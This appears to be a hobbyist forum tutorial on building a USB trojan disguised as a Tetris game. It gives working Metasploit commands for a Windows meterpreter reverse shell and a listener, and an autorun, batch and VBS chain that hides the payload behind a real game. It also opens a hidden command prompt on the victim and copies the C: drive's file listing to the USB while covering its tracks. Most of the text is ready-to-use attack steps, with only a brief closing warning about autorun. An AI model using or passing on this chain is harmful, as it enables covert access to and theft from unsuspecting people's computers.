In this case I will be creating a payload to be run on the computer I want to access.
Gratz to Gitsnik for the assistance in getting through the parts where I got stuck :D
Using back|track 4 Pre Final
Open up a shell
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 X > payload.exe
192.168.1.101 being the IP address of the machine I am running back|track from.
This payload.exe is the file we need to be executed on the PC on our network we would like to access.
To re-enact a more real-world situation, I have done the following;
> Got a small USB drive and renamed it to "TETRIS"
> Renamed the payload.exe to tetris.exe and copied to the root of a USB drive.
Changed the attributes of tetris.exe to 'hidden'.
> Copied a real tetris executable to the root of the USB drive and re-named to -TETRIS-.exe.
> Created a batch file "start.bat" to run both tetris.exe & -TETRIS-.exe
Changed attributes of start.bat to 'hidden'.
Created an autorun file to run the batch file, copying the icon from the real tetris executable
and including an action to the start-up menu ; "PLAY TETRIS".
Changed attributes of autorun.inf to 'hidden'.
On my main PC the settings are such that autorun is disabled, and to show all hidden and system files.
So when opening the drive it looks like this ;
On most stock installs of windows autorun is on and the settings are to hide hidden files from view, so when inserting the USB you would see this ;
To start up the session, we first need to create a session the attacking PC, with which to communicate with the payload.
In a shell;
Then in msfconsole;
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.101
Now we insert the USB into a stock windows machine (target), consider ourselves witless and click on OK..
wait for the connection on our attacking machine.
Following clicking OK the target pc is presented with a brief glimpse of a command-prompt window advising starting tetris.exe and -TETRIS-.exe, followed by a (working) Tetris game opening;
Seeing a command prompt opening and running a couple of exe files would wake most people up,
but most people dont seem to worry about what is happening on the pc as long as it 'does what they want it to do'.
You can also edit the start.bat file to ;
@ echo off
This will still briefly open up a command prompt, but no information will be shown on what it is doing.
After the tetris.exe is executed on the target's machine, the msfconsole should start a session and the screen should change to;
You can then type ;
execute -f cmd.exe -c -H -i
This should get you a command prompt, hidden from sight by the actual user of the target's machine (-H), but under your control and you are able to browse through the targets pc etc.
If there is any type of firewall installed, it will ask for permission to allow 'tetris.exe' to access the internet.
As the user is running a tetris program, this could fool the user into accepting this.
So goes to show..
> TURN AUTORUN OFF
> be very careful about what you plug into your system
> Make sure you know precisely what you are allowing to access the internet..
===I fine tuned the files on the USB to be a little less obvious when starting up and for fun added a line to get a list of all files and directories from the c-drive.
Not that this has anything to do with the exploit, but it was fun to play around with ;)
So I created a vbs file with the following code;
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "-TETRIS-.bat" & Chr(34), 0
Set WshShell = Nothing
and named it -TETRIS-.vbs
Altered the autorun.in to start the vbs file;
Created a new autorun pointing to the -TETRIS-.exe to later replace the original one pointing to -TETRIS-.vbs and named this tetris.inf
Altered the -TETRIS-.bat file to
- list the folders and files of c-drive, copy this information to USB and give it hidden attributes and delete the file from the host c-drive.
- delete the original autorun file and replace it with one which only points to -TETRIS-.exe
- delete the -TETRIS-.vbs file
@ echo off
start -TETRIS-.exe && start Tetris.exe
tree /f /a C:\ > c:\tree_c.lst && copy c:\tree_c.lst -TETRIS-.ini && attrib +h "-TETRIS-.ini" && del c:\tree_c.lst
attrib -h autorun.inf && attrib -h tetris.inf && del autorun.inf && ren tetris.inf autorun.inf
attrib -h "-TETRIS-.vbs" && del -TETRIS-.vbs
So basically when OK is clicked after inserting the USB drive on a PC with autorun enabled, exploit is started, the tetris game opens without command prompts, a list of all folders and files of the c-drive is made, copied to the USB drive as a hidden file named -TETRIS-.ini.
The new autorun is not hidden and only points to the game, the vbs file is deleted.
Basically I did this so that even if the unsuspecting user sees the hidden files, the names and types of files look as if they are something to do with the tetris game.
Anyone with any idea of how things work will of course see something is up ;)
Completely useless but fun to make :) even though the ugliness of it all will probably make Gitsnik cry..